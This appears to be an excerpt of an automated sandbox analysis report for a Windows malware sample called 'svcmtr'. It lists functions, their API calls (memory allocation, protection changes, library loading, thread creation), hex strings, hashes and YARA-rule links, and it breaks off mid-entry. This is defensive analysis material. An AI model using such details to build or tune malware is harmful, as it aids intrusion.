                                                                                                                            • API String ID: 221334729-2720293584
                                                                                                                            • Opcode ID: 4a74c95ecf76a29523d0646e12d963312ebac3b5181e056660efc3377ef08282
                                                                                                                            • Instruction ID: 68f498cd6aaf7dc1cd63195ba9e4301ef2104bc8583fa51ee68a2c2ad5c38cb0
                                                                                                                            • Opcode Fuzzy Hash: 4a74c95ecf76a29523d0646e12d963312ebac3b5181e056660efc3377ef08282
                                                                                                                            • Instruction Fuzzy Hash: AE5103B25102019BD720EF28DC81AE773E4FB98701F844A2BF055E7264E3B49AC4C79A
                                                                                                                            Function 00401D34 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • lIC, xrefs: 00401E5A
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F27, 00401F3B, 00401F3C
                                                                                                                            • 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264, xrefs: 00401F17
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$lIC
                                                                                                                            • API String ID: 0-1019445454
                                                                                                                            • Opcode ID: 5a9cb899e8df9a3df085e5f279fa370133094aa172304d2f827e5193b57b2ac2
                                                                                                                            • Instruction ID: 30f9dac797f5ed8995255b9b1ef71897d5da9c610d1a86821df74dede1b52de5
                                                                                                                            • Opcode Fuzzy Hash: 5a9cb899e8df9a3df085e5f279fa370133094aa172304d2f827e5193b57b2ac2
                                                                                                                            • Instruction Fuzzy Hash: D771F0726002019BC720EB65DCC1E6B77A4AF88318F04497EF945B73A1C77DAD4587EA
                                                                                                                            Function 00401E3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 157COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • lIC, xrefs: 00401E5A
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F27, 00401F3B, 00401F3C
                                                                                                                            • 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264, xrefs: 00401F17
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free
                                                                                                                            • String ID: 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$lIC
                                                                                                                            • API String ID: 269201875-1019445454
                                                                                                                            • Opcode ID: 04270b1e4ae75e3513a58e087a78b16936eb645fb4be62ff50a40396683c2232
                                                                                                                            • Instruction ID: ab4dd70a3e5f9ffcd353ed3fbdbd548839b92ebe7994dca93fb587f8005bb5b5
                                                                                                                            • Opcode Fuzzy Hash: 04270b1e4ae75e3513a58e087a78b16936eb645fb4be62ff50a40396683c2232
                                                                                                                            • Instruction Fuzzy Hash: B44111716001129BC710EB65EC8196F73E4AB89318F18487AFC45B73A2C77DAD4987DA
                                                                                                                            Function 00401E2B Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • lIC, xrefs: 00401E5A
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F27, 00401F3B, 00401F3C
                                                                                                                            • 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264, xrefs: 00401F17
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00401F46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free
                                                                                                                            • String ID: 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$lIC
                                                                                                                            • API String ID: 269201875-1019445454
                                                                                                                            • Opcode ID: 12c2dea4cb6f7e1698baaf94613219b82afe0b96f6d98cbe3bed5ded39d616b2
                                                                                                                            • Instruction ID: 32f57241c02f5393bf1391ab83f59f06f9657c66791189926f83ff8051c085f3
                                                                                                                            • Opcode Fuzzy Hash: 12c2dea4cb6f7e1698baaf94613219b82afe0b96f6d98cbe3bed5ded39d616b2
                                                                                                                            • Instruction Fuzzy Hash: AB4122716001129BC710EB65EC8196F73E4AF89318F18487AFC45B73A2C77DAD4987DA
                                                                                                                            Function 00231DD0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4275171209-2181537457
                                                                                                                            • Opcode ID: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction ID: 776a5c64f1a306dd56843be8127c0eba6ea4a7ea08eb195fb411112e3a0670e1
                                                                                                                            • Opcode Fuzzy Hash: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction Fuzzy Hash: 7591ACF6A30622DAFF1C5670CC66BBC2516E7E0700F28E52DA203D9593DEFD48759910
                                                                                                                            Function 0023137C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction ID: b20c1959161d0f1f9c531eb60a5189586cdbcece0d3637516fb23815953db608
                                                                                                                            • Opcode Fuzzy Hash: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction Fuzzy Hash: C951E777E201249FEF0CCF69DC91ABCB7A2FBD4310F1A9129D506EF691DA7899108650
                                                                                                                            Function 002315FA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNEL32(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction ID: 30c78a522f2e71bc220e65b5c7970da539e64260b9fdfd2025595f88e36ee212
                                                                                                                            • Opcode Fuzzy Hash: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction Fuzzy Hash: B4417EF3A301128BEB0C5BA8CD66BBDA599E7D4700F2CD53DA003D92C2DEBC44709960
                                                                                                                            Function 002313BB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction ID: 2c4837a0af600eb7f25f44e8345b599641db20ef1f249705d6615fcd0763e197
                                                                                                                            • Opcode Fuzzy Hash: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction Fuzzy Hash: 7041A577E20124DFDF0CCF99D881AACB7B2FBD4310F169169D906AF691DB7499108A90
                                                                                                                            Function 00231639 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNEL32(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction ID: 60459ea788514fb387b3a35e0d280d9ae4b321a29c886091a4ac0bfa301d5fbb
                                                                                                                            • Opcode Fuzzy Hash: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction Fuzzy Hash: B0415EB3A341129BDB0C5BA8CD566BDB6A5EBD4301F2DD62DD003DA286DFBC44709A60
                                                                                                                            Function 0041B7F4 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041B830
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041B84C
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041B853
                                                                                                                            • GlobalMemoryStatus.KERNEL32(?), ref: 0041B866
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0041B8A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCountCurrentFreeGlobalHandleLibraryMemoryProcessStatusTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3344549487-0
                                                                                                                            • Opcode ID: 8ec9495c5c8c3def42768fa3f7287ae333d64ad60be0a61d2b8b86069c3be97d
                                                                                                                            • Instruction ID: 246000e8983a6ad2c6fa842b23d7700f142d6bf1d3abb13d60bd01c03ee38282
                                                                                                                            • Opcode Fuzzy Hash: 8ec9495c5c8c3def42768fa3f7287ae333d64ad60be0a61d2b8b86069c3be97d
                                                                                                                            • Instruction Fuzzy Hash: DD2174706147058BC720EF75D884BABB7F8FB85700F00C93EE54996250EB78D8858B9A
                                                                                                                            Function 0041E7A0 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(004C6B20,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E7BB
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000064,00000000,00000000,?,0041D888), ref: 0041E7CF
                                                                                                                            • ReadFile.KERNEL32(00000000,0041D888,00000004,?,00000000), ref: 0041E7E2
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041E7E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandlePointerRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4133201480-0
                                                                                                                            • Opcode ID: 1a1e99fa9a9fddd772163efd5d35fe45a9f919362a9285d703c580583bd4ed59
                                                                                                                            • Instruction ID: 434d6d844fe2b3ef8dad71a426d5a1eb9601029910844f721659a462d3881f6e
                                                                                                                            • Opcode Fuzzy Hash: 1a1e99fa9a9fddd772163efd5d35fe45a9f919362a9285d703c580583bd4ed59
                                                                                                                            • Instruction Fuzzy Hash: C7F06835A8535476FB20A7946C0AFED7B68C705B11F100196FF04B61D0E6A51A55C3AE
                                                                                                                            Function 00231EBB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 278COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction ID: 2becfb1312bca027ec711fc72dfe731846032c906d6c346913d924ad6d5e0069
                                                                                                                            • Opcode Fuzzy Hash: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction Fuzzy Hash: A37156FAA74722DAFB1C62B4CC66BBC2416EBE0711F68A52DA303D95D3CEEC44645910
                                                                                                                            Function 00231EFA Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction ID: 1f2713b15d191a3e6ff4aa7b7b5bb86564c5ab67c13c1dd1677a4f5e2cf529fb
                                                                                                                            • Opcode Fuzzy Hash: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction Fuzzy Hash: D46188FAA30722DAFB1C52B4CC66BBC6456EBE0710F2CF52DA203D8593CEEC44649910
                                                                                                                            Function 00231F25 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 239COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction ID: 4c5889ccbfee01b959fb99ad92e9a9818881da2afc227050a63deb5dc84a1498
                                                                                                                            • Opcode Fuzzy Hash: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction Fuzzy Hash: B5518AFAA34722DAFB1C52B4CD56BBC2416E7E0710F28F52DA343D9593CEEC44689910
                                                                                                                            Function 00231013 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction ID: 7cbc2ba3af5a4e56bee967a37a3363aaa9e13873e80c38a29cd49190461c2271
                                                                                                                            • Opcode Fuzzy Hash: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction Fuzzy Hash: 0F6166F2B746528EEB0D8A68CCA17BD6696EBC0301F28D13DCA43DA1D5DEF844718A50
                                                                                                                            Function 00231F30 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction ID: c166ac209fa431da22314d504f111604cd9e5dd1dcf0258f41aa6a2790330bca
                                                                                                                            • Opcode Fuzzy Hash: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction Fuzzy Hash: 2B519CFAA34722DAFB1C52A4CD56BBC2516E7E0710F2CF52DA343D9587CEEC44689910
                                                                                                                            Function 00231F58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction ID: b4e4918b73231de077afd7453380209ab017ed3985eec5590f99093f13a64a07
                                                                                                                            • Opcode Fuzzy Hash: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction Fuzzy Hash: F451ACF6A34722DAFB1C52A4CD56BBC2512EBE0710F28E12DA343E9583CEEC44689910
                                                                                                                            Function 00231F6A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 214COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction ID: 8e4ecb22d3db65a7f38ff8f47668fc3003e4c317f8715ea9487af5c1e964df93
                                                                                                                            • Opcode Fuzzy Hash: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction Fuzzy Hash: 60518DF7A74722DAFB1C52A4CD66BBC2516E7D0710F28E52DA343E91C7CDEC44689910
                                                                                                                            Function 00231FA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction ID: 383667d6ffd92839c42c6a43828ab1bd69b0dc22cbcbeb1007246b81f0adb493
                                                                                                                            • Opcode Fuzzy Hash: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction Fuzzy Hash: 9251ABF6A34722DAEB1C52A4CD56BBC7512EBE0711F28E12DA347E9187CEF804689910
                                                                                                                            Function 00231FDF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
